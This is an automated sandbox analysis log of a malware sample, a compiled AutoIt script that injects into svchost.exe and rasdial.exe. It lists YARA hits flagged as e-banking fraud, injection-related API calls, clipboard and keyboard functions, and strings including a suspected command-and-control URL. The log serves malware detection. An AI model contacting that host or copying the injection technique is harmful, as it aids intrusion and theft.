                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 18:19:16 GMTContent-Type: text/htmlContent-Length: 168Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>
                Source: GVXcOVOPuWmumK.exe, 00000007.00000002.2587932076.0000000005569000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lgdiamonds.info
                Source: GVXcOVOPuWmumK.exe, 00000007.00000002.2587932076.0000000005569000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lgdiamonds.info/cv1w/
                Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: rasdial.exe, 00000006.00000002.2583016993.0000000003445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: rasdial.exe, 00000006.00000002.2583016993.0000000003445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: rasdial.exe, 00000006.00000002.2583016993.0000000003445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
                Source: rasdial.exe, 00000006.00000002.2583016993.0000000003445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: rasdial.exe, 00000006.00000002.2583016993.0000000003445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: rasdial.exe, 00000006.00000002.2583016993.0000000003445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: rasdial.exe, 00000006.00000002.2583016993.0000000003445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: rasdial.exe, 00000006.00000003.1891460073.00000000081FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0071EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_0071EAFF
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0071ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_0071ED6A
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0071EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_0071EAFF
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0070AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,1_2_0070AA57
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00739576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_00739576

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2581837610.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2585563480.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1703918121.0000000006920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2585328157.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1701029410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2587932076.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1702227169.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2585572364.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: cNDddMAF5u.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: cNDddMAF5u.exe, 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d19bfb2a-e
                Source: cNDddMAF5u.exe, 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_de27639f-b
                Source: cNDddMAF5u.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_51ba31f2-4
                Source: cNDddMAF5u.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cd523b04-6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042C8B3 NtClose,3_2_0042C8B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72B60 NtClose,LdrInitializeThunk,3_2_03C72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03C72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03C72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C735C0 NtCreateMutant,LdrInitializeThunk,3_2_03C735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C74340 NtSetContextThread,3_2_03C74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C74650 NtSuspendThread,3_2_03C74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72BE0 NtQueryValueKey,3_2_03C72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72BF0 NtAllocateVirtualMemory,3_2_03C72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72B80 NtQueryInformationFile,3_2_03C72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72BA0 NtEnumerateValueKey,3_2_03C72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72AD0 NtReadFile,3_2_03C72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72AF0 NtWriteFile,3_2_03C72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72AB0 NtWaitForSingleObject,3_2_03C72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72FE0 NtCreateFile,3_2_03C72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72F90 NtProtectVirtualMemory,3_2_03C72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72FA0 NtQuerySection,3_2_03C72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72FB0 NtResumeThread,3_2_03C72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72F60 NtCreateProcessEx,3_2_03C72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72F30 NtCreateSection,3_2_03C72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72EE0 NtQueueApcThread,3_2_03C72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72E80 NtReadVirtualMemory,3_2_03C72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72EA0 NtAdjustPrivilegesToken,3_2_03C72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72E30 NtWriteVirtualMemory,3_2_03C72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72DD0 NtDelayExecution,3_2_03C72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72DB0 NtEnumerateKey,3_2_03C72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72D00 NtSetInformationFile,3_2_03C72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72D10 NtMapViewOfSection,3_2_03C72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72D30 NtUnmapViewOfSection,3_2_03C72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72CC0 NtQueryVirtualMemory,3_2_03C72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72CF0 NtOpenProcess,3_2_03C72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72CA0 NtQueryInformationToken,3_2_03C72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72C60 NtCreateKey,3_2_03C72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C72C00 NtQueryInformationProcess,3_2_03C72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C73090 NtSetValueKey,3_2_03C73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C73010 NtOpenDirectoryObject,3_2_03C73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C739B0 NtGetContextThread,3_2_03C739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C73D70 NtOpenThread,3_2_03C73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C73D10 NtOpenProcessToken,3_2_03C73D10
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05244650 NtSuspendThread,LdrInitializeThunk,6_2_05244650
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05244340 NtSetContextThread,LdrInitializeThunk,6_2_05244340
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_05242D30
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242D10 NtMapViewOfSection,LdrInitializeThunk,6_2_05242D10
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_05242DF0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242DD0 NtDelayExecution,LdrInitializeThunk,6_2_05242DD0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242C60 NtCreateKey,LdrInitializeThunk,6_2_05242C60
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_05242C70
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_05242CA0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242F30 NtCreateSection,LdrInitializeThunk,6_2_05242F30
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242FB0 NtResumeThread,LdrInitializeThunk,6_2_05242FB0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242FE0 NtCreateFile,LdrInitializeThunk,6_2_05242FE0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_05242E80
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242EE0 NtQueueApcThread,LdrInitializeThunk,6_2_05242EE0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242B60 NtClose,LdrInitializeThunk,6_2_05242B60
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_05242BA0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242BE0 NtQueryValueKey,LdrInitializeThunk,6_2_05242BE0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_05242BF0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242AF0 NtWriteFile,LdrInitializeThunk,6_2_05242AF0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242AD0 NtReadFile,LdrInitializeThunk,6_2_05242AD0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052435C0 NtCreateMutant,LdrInitializeThunk,6_2_052435C0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052439B0 NtGetContextThread,LdrInitializeThunk,6_2_052439B0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242D00 NtSetInformationFile,6_2_05242D00
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242DB0 NtEnumerateKey,6_2_05242DB0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242C00 NtQueryInformationProcess,6_2_05242C00
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242CF0 NtOpenProcess,6_2_05242CF0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242CC0 NtQueryVirtualMemory,6_2_05242CC0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242F60 NtCreateProcessEx,6_2_05242F60
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242FA0 NtQuerySection,6_2_05242FA0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242F90 NtProtectVirtualMemory,6_2_05242F90
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242E30 NtWriteVirtualMemory,6_2_05242E30
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242EA0 NtAdjustPrivilegesToken,6_2_05242EA0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242B80 NtQueryInformationFile,6_2_05242B80
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05242AB0 NtWaitForSingleObject,6_2_05242AB0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05243010 NtOpenDirectoryObject,6_2_05243010
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05243090 NtSetValueKey,6_2_05243090
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05243D10 NtOpenProcessToken,6_2_05243D10
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05243D70 NtOpenThread,6_2_05243D70
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_03229710 NtDeleteFile,6_2_03229710
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_032297B0 NtClose,6_2_032297B0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_03229620 NtReadFile,6_2_03229620
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_032294B0 NtCreateFile,6_2_032294B0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_03229920 NtAllocateVirtualMemory,6_2_03229920
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0070D5EB: CreateFileW,DeviceIoControl,CloseHandle,1_2_0070D5EB
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00701201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00701201
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0070E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_0070E8F6
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006ABF401_2_006ABF40
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006A80601_2_006A8060
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_007120461_2_00712046
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_007082981_2_00708298
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006DE4FF1_2_006DE4FF
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006D676B1_2_006D676B
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_007348731_2_00734873
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006ACAF01_2_006ACAF0
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006CCAA01_2_006CCAA0
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006BCC391_2_006BCC39
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006D6DD91_2_006D6DD9
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006BD07D1_2_006BD07D
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006BB1191_2_006BB119
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006A91C01_2_006A91C0
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006C13941_2_006C1394
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006C17061_2_006C1706
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006C781B1_2_006C781B
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006B997D1_2_006B997D
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006A79201_2_006A7920
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006C19B01_2_006C19B0
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006C7A4A1_2_006C7A4A
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006C1C771_2_006C1C77
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006C7CA71_2_006C7CA7
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0072BE441_2_0072BE44
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006D9EEE1_2_006D9EEE
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006C1F321_2_006C1F32
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_016D64881_2_016D6488
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004187733_2_00418773
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041696F3_2_0041696F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004169733_2_00416973
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004101C33_2_004101C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E1B33_2_0040E1B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004022FD3_2_004022FD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E2FE3_2_0040E2FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004023003_2_00402300
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E3033_2_0040E303
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004026603_2_00402660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402E803_2_00402E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042EF333_2_0042EF33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040FF9C3_2_0040FF9C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040FFA33_2_0040FFA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4E3F03_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D003E63_2_03D003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFA3523_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC02C03_2_03CC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE02743_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF81CC3_2_03CF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF41A23_2_03CF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D001AA3_2_03D001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CC81583_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C301003_2_03C30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDA1183_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD20003_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3C7C03_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C647503_2_03C64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C407703_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5C6E03_2_03C5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D005913_2_03D00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C405353_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CEE4F63_2_03CEE4F6
